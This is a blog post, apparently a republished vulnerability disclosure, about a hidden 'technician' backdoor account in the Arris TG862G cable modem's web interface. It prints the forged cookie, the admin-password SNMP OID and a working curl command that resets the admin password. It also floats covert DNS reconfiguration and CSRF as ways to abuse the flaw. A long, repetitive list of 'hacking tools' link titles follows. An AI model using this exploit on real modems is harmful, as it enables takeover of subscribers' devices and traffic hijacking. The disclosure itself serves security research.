Pages

Thursday, June 1, 2023

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts

  1. Nsa Hack Tools
  2. Pentest Reporting Tools
  3. Hack Rom Tools
  4. Hacking Tools Download
  5. Hacker Tools 2019
  6. Bluetooth Hacking Tools Kali
  7. How To Hack
  8. Pentest Automation Tools
  9. Hack Tool Apk No Root
  10. Hacking Tools 2020
  11. Pentest Tools Review
  12. Hacking Tools For Mac
  13. Hacker Tools For Windows
  14. How To Make Hacking Tools
  15. Free Pentest Tools For Windows
  16. Pentest Tools Find Subdomains
  17. World No 1 Hacker Software
  18. Pentest Tools Url Fuzzer
  19. Best Pentesting Tools 2018
  20. Pentest Tools Open Source
  21. Hacking Tools Windows 10
  22. Hacking Tools Online
  23. Hack And Tools
  24. Black Hat Hacker Tools
  25. Hacking Tools For Windows Free Download
  26. Hacking Tools Usb
  27. Hacker Techniques Tools And Incident Handling
  28. Hacker Tools Github
  29. Pentest Tools Find Subdomains
  30. Hacking Tools Windows
  31. Hack Tools Download
  32. Hacks And Tools
  33. Pentest Tools Linux
  34. Hack Tools Pc
  35. Hacking Tools Free Download
  36. Hack Tools Mac
  37. Nsa Hack Tools Download
  38. Nsa Hack Tools
  39. Hacking Tools Download
  40. Blackhat Hacker Tools
  41. Hacking Tools Kit
  42. Hack Tools 2019
  43. Hacking Tools Pc
  44. How To Hack
  45. Hack Tools For Windows
  46. Hack Tools Pc
  47. Hack And Tools
  48. Hacking Tools Mac
  49. Hacking Tools For Windows Free Download
  50. Hacker Search Tools
  51. Pentest Tools For Mac
  52. Hack Tools Mac
  53. How To Hack
  54. Hack Tools Download
  55. Hacking Tools Kit
  56. Pentest Tools Nmap
  57. Android Hack Tools Github
  58. Android Hack Tools Github
  59. Best Hacking Tools 2019
  60. Pentest Tools Free
  61. Hack Tools For Mac
  62. Tools 4 Hack
  63. Hacking Tools For Windows
  64. Pentest Tools Windows
  65. Hacker Tools Mac
  66. Hacking Tools Github
  67. Hacking Tools For Pc
  68. Hacking Tools Free Download
  69. Hacking Tools Software
  70. Pentest Tools Url Fuzzer
  71. Blackhat Hacker Tools
  72. Pentest Tools Framework
  73. Hack Rom Tools
  74. Pentest Tools List
  75. Pentest Tools For Windows
  76. Pentest Tools Find Subdomains
  77. Hacker Tools Free Download
  78. Pentest Tools Framework
  79. Hacker Search Tools
  80. Hacking Tools For Kali Linux
  81. Pentest Tools Apk
  82. What Are Hacking Tools
  83. Hack Rom Tools
  84. Hacking Tools 2019
  85. Pentest Tools For Android
  86. Hacker Tools Linux
  87. Pentest Tools Website Vulnerability
  88. Hacking Apps
  89. Hacker Tools Github
  90. Hack Tools For Games
  91. Pentest Tools Find Subdomains
  92. Pentest Tools Port Scanner
  93. Pentest Tools Framework
  94. New Hack Tools
  95. Hacker Tools Apk Download
  96. Pentest Automation Tools
  97. Pentest Tools Nmap
  98. Hacking Tools For Pc
  99. Hacking Tools For Games
  100. Hacker Tools For Windows
  101. Pentest Tools Find Subdomains
  102. Install Pentest Tools Ubuntu
  103. Pentest Tools Url Fuzzer
  104. Best Pentesting Tools 2018
  105. Pentest Tools Apk
  106. Pentest Tools Linux
  107. Hack Tools Mac
  108. Hack Tools
  109. Pentest Tools For Android
  110. Hacking Tools For Windows
  111. Hacking Tools For Mac
  112. Hak5 Tools
  113. Hacker Tools Online
  114. Hacker Tools
  115. Hack Tools Github
  116. Install Pentest Tools Ubuntu
  117. Pentest Tools
  118. Hacker Tools 2019
  119. Pentest Tools Website Vulnerability
  120. Hacker Tools Software
  121. Hacker Tools Hardware
  122. Hacker Tools 2020
  123. Hacker Tools For Mac
  124. Pentest Tools Linux
  125. Pentest Tools Download
  126. Android Hack Tools Github
  127. Hacker Tools For Mac
  128. Pentest Tools Review
  129. Pentest Tools For Mac
  130. Hack Tools
  131. Blackhat Hacker Tools
  132. Hacking Tools For Windows Free Download
  133. Hacking Tools For Beginners
  134. Pentest Tools Windows
  135. Hack Tools Pc
  136. Best Hacking Tools 2019
  137. Hacking Tools Free Download
  138. Hacking Tools Windows
Posted by istaq86 at 9:58 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)